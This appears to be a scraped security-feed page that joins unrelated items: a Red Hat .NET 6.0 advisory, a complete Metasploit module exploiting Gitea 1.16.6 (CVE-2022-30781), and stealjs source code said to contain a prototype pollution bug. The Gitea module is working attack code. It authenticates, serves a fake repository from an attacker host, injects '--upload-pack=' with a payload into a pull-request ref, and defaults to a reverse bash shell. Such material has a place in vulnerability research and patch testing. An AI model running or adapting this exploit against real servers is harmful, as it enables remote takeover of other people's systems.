Red Hat Security Advisory 2022-6518-01 - MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.

Red Hat Security Advisory 2022-6518-01

Red Hat Security Advisory 2022-6521-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET 6.0 to SDK 6.0.109 and Runtime 6.0.9.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET 6.0 security and bugfix update  
Advisory ID:       RHSA-2022:6521-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6521  
Issue date:        2022-09-14  
CVE Names:         CVE-2022-38013  
====================================================================  
1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET 6.0 to SDK 6.0.109 and Runtime  
6.0.9.

Security Fix(es):

* dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow  
via ModelStateDictionary recursion. (CVE-2022-38013)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2125124 - CVE-2022-38013 dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow via ModelStateDictionary recursion.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
dotnet6.0-6.0.109-1.el9_0.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.9-1.el9_0.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el9_0.aarch64.rpm  
dotnet-host-6.0.9-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.9-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-6.0.9-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-6.0.109-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el9_0.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el9_0.aarch64.rpm  
dotnet-templates-6.0-6.0.109-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.109-1.el9_0.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el9_0.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.9-1.el9_0.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el9_0.s390x.rpm  
dotnet-host-6.0.9-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.9-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-6.0.9-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-6.0.109-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el9_0.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el9_0.s390x.rpm  
dotnet-templates-6.0-6.0.109-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.109-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.109-1.el9_0.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el9_0.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.9-1.el9_0.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el9_0.x86_64.rpm  
dotnet-host-6.0.9-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.9-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-6.0.9-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-6.0.109-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el9_0.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el9_0.x86_64.rpm  
dotnet-templates-6.0-6.0.109-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.109-1.el9_0.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.9-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.109-1.el9_0.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.9-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.109-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.109-1.el9_0.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.9-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.109-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38013  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyInqtzjgjWX9erEAQgVthAAgn0FNArb7QMChMi5/Psidn0v7ScFvYIy  
zt2Wj3xO1FIc4hYjrj9IHf0SzZOgrgvbfN32SBiTwZMTm9sAUIy/retoK7YoZg0r  
sTeTthlvibMikftv9I2328vVxeCmViOkO1i89vnR4CYCmP6YTGkwFf3lWxZt84wK  
99oy4vOGPsPcKohydzPyrIcXwiXoOKeXyB8imDlUgqIHGqMWhbioZKYWRmJEFT09  
VXYsC48xwSSyHluqSv4o8AlIry1cdkoBBFOev2M9BKYhgtKKODhJWh96ziUiXn3/  
BdeUXDz/XG2h8DgcqtIYmR8hVCU9WTIAjnDkARKsFdWyUopok3gUn0S1RTMCDISE  
Pz15sTWSsmLdnhT78BvhjlYn7amT/ZcztYHu359XcQDRmq/1WShiJ4+fZoWMmmBD  
aSmtQboyHawH6LAPLJUwMhl+7OjK8K5ljl/GDMA0PX7jIOA0S7tu8Oq6pIBW49oW  
AQkKoR4hDcvH9Ax/JxyFyQfMtbBKPpVSGn23vTSr+76rU36fcWYsj0ohwI2zw2/F  
1pN5tiDda/6zSbRmQVtjS/QUvZ07oSLDzmuacTuHjyNQ2fT4fIQmYrMtSlrU5AlB  
ZI9xqVFZfNYj1jsOsb1H7o+M3Oyvvlc1+jQVMTD/rauixsufu0jEEDVUBJuksnzh  
smIfPFqvg50=8wZd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6521-01

This Metasploit module exploits the Git fetch command in Gitea repository migration process that leads to a remote command execution on the system. This vulnerability affects Gitea versions prior to 1.16.7.

    # Exploit Title: Gitea Git Fetch Remote Code Execution# Date: 09/14/2022# Exploit Author: samguy# Vendor Homepage: https://gitea.io# Software Link: https://dl.gitea.io/gitea/1.16.6# Version: <= 1.16.6# Tested on: Linux - Debian# Ref : https://tttang.com/archive/1607/# CVE : CVE-2022-30781### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Gitea Git Fetch Remote Code Execution',        'Description' => %q{          This module exploits Git fetch command in Gitea repository migration          process that leads to a remote command execution on the system.          This vulnerability affect Gitea before 1.16.7 version.        },        'Author' => [          'wuhan005 & li4n0', # Original PoC          'krastanoel'        # MSF Module        ],        'References' => [          ['CVE', '2022-30781'],          ['URL', 'https://tttang.com/archive/1607/']        ],        'DisclosureDate' => '2022-05-16',        'License' => MSF_LICENSE,        'Platform' => %w[unix win],        'Arch' => ARCH_CMD,        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],        ],        'DefaultOptions' => { 'WfsDelay' => 30 },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => []        }      )    )    register_options([      Opt::RPORT(3000),      OptString.new('TARGETURI', [true, 'Base path', '/']),      OptString.new('USERNAME', [true, 'Username to authenticate with']),      OptString.new('PASSWORD', [true, 'Password to use']),      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait', 12])    ])  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/user/login'),      'keep_cookies' => true    )    return CheckCode::Unknown('No response from the web service') if res.nil?    return CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200    # Powered by Gitea Version: 1.16.6    unless (match = res.body.match(/Gitea Version: (?<version>[\da-zA-Z.]+)/))      return CheckCode::Unknown('Target does not appear to be running Gitea.')    end    if match[:version].match(/[a-zA-Z]/)      return CheckCode::Unknown("Unknown Gitea version #{match[:version]}.")    end    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/user/login'),      'vars_post' => {        'user_name' => datastore['USERNAME'],        'password' => datastore['PASSWORD'],        '_csrf' => get_csrf(res.get_cookies)      },      'keep_cookies' => true    )    return CheckCode::Safe('Authentication failed') if res&.code != 302    if Rex::Version.new(match[:version]) <= Rex::Version.new('1.16.6')      return CheckCode::Appears("Version detected: #{match[:version]}")    end    CheckCode::Safe("Version detected: #{match[:version]}")  rescue ::Rex::ConnectionError    return CheckCode::Unknown('Could not connect to the web service')  end  def primer    ['/api/v1/version', '/api/v1/settings/api',     "/api/v1/repos/#{@migrate_repo_path}",     "/api/v1/repos/#{@migrate_repo_path}/pulls",     "/api/v1/repos/#{@migrate_repo_path}/topics"    ].each { |uri| hardcoded_uripath(uri) } # adding resources    vprint_status("Creating repository \"#{@repo_name}\"")    gitea_create_repo    vprint_good('Repository created')    vprint_status("Migrating repository")    gitea_migrate_repo  end  def exploit    @repo_name = rand_text_alphanumeric(6..15)    @migrate_repo_name = rand_text_alphanumeric(6..15)    @migrate_repo_path = "#{datastore['username']}/#{@migrate_repo_name}"    datastore['URIPATH'] = "/#{@migrate_repo_path}"    Timeout.timeout(datastore['HTTPDELAY']) { super }  rescue Timeout::Error    [@repo_name, @migrate_repo_name].map { |name| gitea_remove_repo(name) }    cleanup # removing all resources  end  def get_csrf(cookies)    csrf = cookies&.split("; ")&.grep(/_csrf=/)&.join&.split("=")&.last    fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf    csrf  end  def gitea_remove_repo(name)    vprint_status("Cleanup: removing repository \"#{name}\"")    uri = "/#{datastore['username']}/#{name}/settings"    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, uri),      'keep_cookies' => true    )    res = send_request_cgi(      'method' => 'POST',      'uri' => uri,      'vars_post' => {        'action' => 'delete',        'repo_name' => name,        '_csrf' => get_csrf(res.get_cookies)      },      'keep_cookies' => true    )    vprint_warning('Unable to remove repository') if res&.code != 302  end  def gitea_create_repo    uri = normalize_uri(target_uri.path, '/repo/create')    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true)    @uid = res&.get_html_document&.at('//input[@id="uid"]/@value')&.text    fail_with(Failure::UnexpectedReply, 'Unable to get repo uid') unless @uid    res = send_request_cgi(      'method' => 'POST',      'uri' => uri,      'vars_post' => {        'uid' => @uid,        'auto_init' => 'on',        'readme' => 'Default',        'repo_name' => @repo_name,        'trust_model' => 'default',        'default_branch' => 'master',        '_csrf' => get_csrf(res.get_cookies)      },      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to create repo') if res&.code != 302  rescue ::Rex::ConnectionError    return CheckCode::Unknown('Could not connect to the web service')  end  def gitea_migrate_repo    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/repo/migrate'),      'keep_cookies' => true    )    uri = res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text    fail_with(Failure::UnexpectedReply, 'Unable to get Gitea service type') unless uri    svc_type = Rack::Utils.parse_query(URI.parse(uri).query)['service_type']    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, uri),      'keep_cookies' => true    )    res = send_request_cgi(      'method' => 'POST',      'uri' => uri,      'vars_post' => {        'uid' => @uid,        'service' => svc_type,        'pull_requests' => 'on',        'repo_name' => @migrate_repo_name,        '_csrf' => get_csrf(res.get_cookies),        'auth_token' => rand_text_alphanumeric(6..15),        'clone_addr' => "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}",      },      'keep_cookies' => true    )    if res&.code != 302 # possibly triggered by the [migrations] settings      err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text      gitea_remove_repo(@repo_name)      cleanup      fail_with(Failure::UnexpectedReply, "Unable to migrate repo: #{err}")    end  rescue ::Rex::ConnectionError    return CheckCode::Unknown('Could not connect to the web service')  end  def on_request_uri(cli, req)    case req.uri    when '/api/v1/version'      send_response(cli, '{"version": "1.16.6"}')    when '/api/v1/settings/api'      data = {        'max_response_items':50,'default_paging_num':30,        'default_git_trees_per_page':1000,'default_max_blob_size':10485760      }      send_response(cli, data.to_json)    when "/api/v1/repos/#{@migrate_repo_path}"      data = {        "clone_url": "#{full_uri}#{datastore['username']}/#{@repo_name}",        "owner": { "login": datastore['username'] }      }      send_response(cli, data.to_json)    when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"      send_response(cli, '{"topics":[]}')    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"      data = [        {          "base": {            "ref": "master",          },          "head": {            "ref": "--upload-pack=#{payload.encoded}",            "repo": {              "clone_url": "./",              "owner": { "login": "master" },            }          },          "updated_at": "2001-01-01T05:00:00+01:00",          "user": {}        }      ]      send_response(cli, data.to_json)    end  endend

Gitea 1.16.6 Remote Code Execution

Prototype pollution vulnerability in function convertLater in npm-convert.js in stealjs steal 2.2.4 via the requestedVersion variable in npm-convert.js.

"format cjs"; var crawl \= require('./npm-crawl'); var utils \= require("./npm-utils"); exports.steal \= convertSteal; exports.propertyNames \= convertPropertyNames; exports.propertyNamesAndValues \= convertPropertyNamesAndValues; exports.name \= convertName; exports.browser \= convertBrowser; exports.browserProperty \= convertBrowserProperty; exports.jspm \= convertJspm; exports.toPackage \= convertToPackage; exports.forPackage \= convertForPackage; function StealConversion(context, pkg, steal, config, isRoot, waiting) { this.context \= context; this.pkg \= pkg; this.steal \= steal; this.config \= utils.extend({}, steal, true); this.isRoot \= isRoot; this.waiting \= \[\]; } // Translate helpers =============== // Given all the package.json data, these helpers help convert it to a source. function convertSteal(context, pkg, steal, root, ignoreWaiting, resavePackageInfo) { if(!steal) { return new StealConversion(context, pkg, steal, root); } var conv \= new StealConversion(context, pkg, steal, root); var waiting \= conv.waiting; if(steal.meta) { steal.meta \= convertPropertyNames(context, pkg, steal.meta, root, waiting); } if(steal.map) { steal.map \= convertPropertyNamesAndValues(context, pkg, steal.map, root, waiting); } if(steal.paths) { steal.paths \= convertPropertyNames(context, pkg, steal.paths, root, waiting); } // needed for builds if(steal.buildConfig) { var buildConv \= convertSteal(context, pkg, steal.buildConfig, root); conv.buildConversion \= buildConv; steal.buildConfig \= conv.config; } return conv; } var lazyConfig \= { // Queue package reconfiguration whenever a package is first loaded. // This is for progressively loaded package.jsons updateConfigOnPackageLoad: function(conv, isPackageInfoSaved, isConfigApplied, isBuildConfigApplied) { var fns \= \[function(){return lazyConfig.cloneConversion.call(this, conv)}\]; if(isPackageInfoSaved) { fns.push(lazyConfig.resavePackageInfo); } if(isConfigApplied) { fns.push(lazyConfig.applyConfig); } var fn \= utils.flow(fns); convertLater(conv.context, conv.waiting, fn); if(isBuildConfigApplied && conv.buildConversion) { var c \= conv.buildConversion; fn \= utils.flow(\[ function(){return lazyConfig.cloneConversion.call(this, c)}, lazyConfig.resavePackageInfo, lazyConfig.applyConfig \]); convertLater(c.context, c.waiting, fn); } }, resavePackageInfo: function(conv) { var info \= utils.pkg.findPackageInfo(conv.context, conv.pkg); info.steal \= info.system \= conv.steal; return conv; }, applyConfig: function(conv) { var config \= conv.steal; var context \= this; // Temporarily remove steal.main so that it doesn't set System.main var stealMain \= config.main; delete config.main; delete config.transpiler; context.loader.config(config); config.main \= stealMain; return conv; }, cloneConversion: function(conv) { var context \= this; var local \= utils.extend({}, conv.config, true); var lConv \= convertSteal(context, conv.pkg, local, conv.isRoot); return lConv; } }; exports.updateConfigOnPackageLoad \= lazyConfig.updateConfigOnPackageLoad; // converts only the property name function convertPropertyNames (context, pkg, map , root, waiting) { if(!map) { return map; } var clone \= {}, value; for(var property in map ) { value \= convertName(context, pkg, map, root, property, waiting); if(typeof value \=== 'string') { clone\[value\] \= map\[property\]; } // do root paths b/c we don't know if they are going to be included with the package name or not. if(root) { value \= convertName(context, pkg, map, false, property, waiting); if(typeof value \=== 'string') { clone\[value\] \= map\[property\]; } } } return clone; } // converts both property name and value function convertPropertyNamesAndValues (context, pkg, map, root, waiting) { if(!map) { return map; } var clone \= {}, val, name; for(var property in map ) { val \= map\[property\]; name \= convertName(context, pkg, map, root, property, waiting); val \= typeof val \=== "object" ? convertPropertyNamesAndValues(context, pkg, val, root, waiting) : convertName(context, pkg, map, root, val, waiting); if(typeof name !== 'undefined' && typeof val !== 'undefined') { clone\[name\] \= val; } // keep map entry if the key isn't a package but value might if (name && typeof val \=== "undefined") { clone\[name\] \= map\[property\]; } } return clone; } function convertName (context, pkg, map, root, name, waiting) { var parsed \= utils.moduleName.parse(name, pkg.name, null, context), depPkg, requestedVersion; if( name.indexOf("#") \>= 0 ) { // If this is a fully converted name just return the name. if(utils.moduleName.isFullyConvertedNpm(parsed)) { return name; } if(parsed.packageName \=== pkg.name) { parsed.version \= pkg.version; } else { // Get the requested version's actual version. requestedVersion \= crawl.getDependencyMap(context.loader, pkg, root)\[parsed.packageName\].version; depPkg \= crawl.matchedVersion(context, parsed.packageName, requestedVersion); // This hasn't been crawled yet, so convert later if(!depPkg) { waiting.push({ packageName: parsed.packageName, requestedVersion: requestedVersion }); return; } parsed.version \= depPkg.version; } return utils.moduleName.create(parsed); } else { if(root && name.substr(0,2) \=== "./" ) { return name.substr(2); } else { // this is for a module within the package if (name.substr(0,2) \=== "./" ) { return utils.moduleName.create({ packageName: pkg.name, modulePath: name, version: pkg.version, plugin: parsed.plugin }); } else { // SYSTEM.NAME if( pkg.name \=== parsed.packageName || ( (pkg.system && pkg.system.name) \=== parsed.packageName) ) { depPkg \= pkg; } else { var requestedProject \= crawl.getDependencyMap(context.loader, pkg, root)\[parsed.packageName\]; if(!requestedProject) { return name; } requestedVersion \= requestedProject.version; depPkg \= crawl.matchedVersion(context, parsed.packageName, requestedVersion); // If we still didn't find one just use the first available version. if(!depPkg) { var versions \= context.versions\[parsed.packageName\]; depPkg \= versions && versions\[requestedVersion\]; if(!depPkg) { waiting.push({ packageName: parsed.packageName, requestedVersion: requestedVersion }); return; } } } // SYSTEM.NAME if(depPkg.system && depPkg.system.name) { parsed.packageName \= depPkg.system.name; } parsed.version \= depPkg.version; if(!parsed.modulePath) { parsed.modulePath \= utils.pkg.main(depPkg); } return utils.moduleName.create(parsed); } } } } /\*\* \* Converts browser names into actual module names. \* \* Example: \* \* \`\`\` \* { \* "foo": "browser-foo" \* "traceur#src/node/traceur": "./browser/traceur" \* "./foo" : "./foo-browser" \* } \* \`\`\` \* \* converted to: \* \* \`\`\` \* { \* // any foo ... regardless of where \* "foo": "browser-foo" \* // this module ... ideally minus version \* "traceur#src/node/traceur": "transpile#./browser/traceur" \* "transpile#./foo" : "transpile#./foo-browser" \* } \* \`\`\` \*/ function convertBrowser(pkg, browser) { var type \= typeof browser; if(type \=== "string" || type \=== "undefined") { return browser; } var map \= {}; for(var fromName in browser) { convertBrowserProperty(map, pkg, fromName, browser\[fromName\]); } return map; } function convertBrowserProperty(map, pkg, fromName, toName) { var packageName \= pkg.name; var fromParsed \= utils.moduleName.parse(fromName, packageName); var toResult \= toName; if(!toName || typeof toName \=== "string") { var toParsed \= toName ? utils.moduleName.parse(toName, packageName) : "@empty"; toResult \= utils.moduleName.create(toParsed); } else if(utils.isArray(toName)) { toResult \= toName; } map\[utils.moduleName.create(fromParsed)\] \= toResult; } function convertJspm(pkg, jspm){ var type \= typeof jspm; if(type \=== "undefined" || type \=== "string") { return jspm; } return { main: jspm.main }; } function convertToPackage(context, npmPkg, index) { var pkg \= npmPkg; var packages \= context.pkgInfo; var nameAndVersion \= pkg.name+"@"+pkg.version; var localPkg; if(!packages\[nameAndVersion\]) { crawl.setVersionsConfig(context, pkg, pkg.version); if(pkg.browser){ delete pkg.browser.transform; } // fake load obj, because we don't have one here pkg \= utils.json.transform(context.loader, { address: pkg.fileUrl, name: pkg.fileUrl.split('/').pop(), metadata: {} }, pkg); var steal \= utils.pkg.config(pkg); var stealConversion \= convertSteal(context, pkg, steal, index \=== 0); lazyConfig.updateConfigOnPackageLoad(stealConversion, context.resavePackageInfo, true, context.applyBuildConfig); localPkg \= { name: pkg.name, version: pkg.version, fileUrl: utils.path.isRelative(pkg.fileUrl) ? pkg.fileUrl : utils.relativeURI(context.loader.baseURL, pkg.fileUrl), main: pkg.main, steal: stealConversion.steal, globalBrowser: convertBrowser(pkg, pkg.globalBrowser), browser: convertBrowser(pkg, pkg.browser || pkg.browserify), jspm: convertJspm(pkg, pkg.jspm), jam: convertJspm(pkg, pkg.jam), resolutions: {} }; packages.push(localPkg); packages\[nameAndVersion\] \= true; } else { localPkg \= utils.filter(packages, function(lpkg){ if(pkg.name \=== lpkg.name && pkg.version \=== lpkg.version) { return lpkg; } })\[0\]; } return localPkg; } /\*\* \* waiting looks like: \* \* \[ \* { packageName: 'can', requestedVersion: '^2.3.0' }, \* { packageName: 'lodash': 'requestedVersion': '~3.0.0' } \* \] \* \* Pushes these objects into a side table. Whenver a package.json is loaded \* it will convert and apply config. \*/ function convertLater(context, waiting, fn) { utils.forEach(waiting, function(p){ var packageName \= p.packageName; var requestedVersion \= p.requestedVersion; var conv \= context.deferredConversions; var pkg \= conv\[packageName\]; if(!pkg) pkg \= conv\[packageName\] \= {}; var vers \= pkg\[requestedVersion\]; if(!vers) vers \= pkg\[requestedVersion\] \= \[\]; vers.push(fn); }); } /\*\* \* When progressively loading package.jsons we need to convert any config \* that is waiting on a package.json to load. This function is called after \* a package is loaded and will call all of the callbacks that cause the \* config to be applied. \*/ function convertForPackage(context, pkg) { var name \= pkg.name; var version \= pkg.version; var conv \= context.deferredConversions; var pkgConv \= conv\[name\]; var depPkg, fns, keys \= 0; if(pkgConv) { for(var range in pkgConv) { depPkg \= crawl.matchedVersion(context, name, range); if(depPkg) { fns \= pkgConv\[range\]; for(var i \= 0, len \= fns.length; i < len; i++) { fns\[i\].call(context); } delete pkgConv\[range\]; } else { keys++; } } if(keys \=== 0) { delete conv\[name\]; } } }

Tag

#js